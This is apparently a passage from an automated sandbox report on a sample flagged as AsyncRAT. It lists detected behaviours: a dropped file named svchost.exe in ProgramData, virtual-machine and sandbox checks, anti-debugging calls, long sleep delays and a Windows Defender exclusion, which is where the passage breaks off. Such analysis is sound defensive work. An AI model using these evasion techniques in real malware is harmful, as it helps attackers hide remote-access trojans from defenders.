Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: a9YMw44iQq.exe PID: 6216, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: a9YMw44iQq.exe, svchost.exe.0.dr

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Memory allocated: AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Memory allocated: 1A400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\svchost.exe	Memory allocated: 7B0000 memory reserve \| memory write watch
Source: C:\ProgramData\svchost.exe	Memory allocated: 1A6A0000 memory reserve \| memory write watch
Source: C:\ProgramData\svchost.exe	Memory allocated: 3100000 memory reserve \| memory write watch
Source: C:\ProgramData\svchost.exe	Memory allocated: 1B210000 memory reserve \| memory write watch
Source: C:\ProgramData\svchost.exe	Memory allocated: FD0000 memory reserve \| memory write watch
Source: C:\ProgramData\svchost.exe	Memory allocated: 1ABA0000 memory reserve \| memory write watch
Source: C:\ProgramData\svchost.exe	Memory allocated: BC0000 memory reserve \| memory write watch
Source: C:\ProgramData\svchost.exe	Memory allocated: 1AAA0000 memory reserve \| memory write watch
Source: C:\ProgramData\svchost.exe	Memory allocated: 28E0000 memory reserve \| memory write watch
Source: C:\ProgramData\svchost.exe	Memory allocated: 1A9F0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598308	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598202	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598090	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 597982	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 597651	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 597436	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\svchost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Window / User API: threadDelayed 1107	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Window / User API: threadDelayed 8734	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6247	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3365	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7956	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1661	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6772	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2886	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8222
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1244

Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -598308s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -598202s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -598090s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -597982s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -597651s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe TID: 2632	Thread sleep time: -597436s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1668	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376	Thread sleep count: 7956 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376	Thread sleep count: 1661 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1468	Thread sleep count: 6772 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1292	Thread sleep count: 2886 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 280	Thread sleep count: 8222 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 280	Thread sleep count: 1244 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 828	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\ProgramData\svchost.exe TID: 7060	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\svchost.exe TID: 5708	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\svchost.exe TID: 3856	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\svchost.exe TID: 5868	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\ProgramData\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\svchost.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598308	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598202	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 598090	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 597982	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 597651	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Thread delayed: delay time: 597436	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\svchost.exe	Thread delayed: delay time: 922337203685477

Source: svchost.exe.0.dr	Binary or memory string: vmware
Source: a9YMw44iQq.exe, 00000000.00000002.3404316306.000000001B1F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

Code function: 0_2_00007FFD34887AD1 CheckRemoteDebuggerPresent,

0_2_00007FFD34887AD1

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\ProgramData\svchost.exe	Process token adjusted: Debug
Source: C:\ProgramData\svchost.exe	Process token adjusted: Debug
Source: C:\ProgramData\svchost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

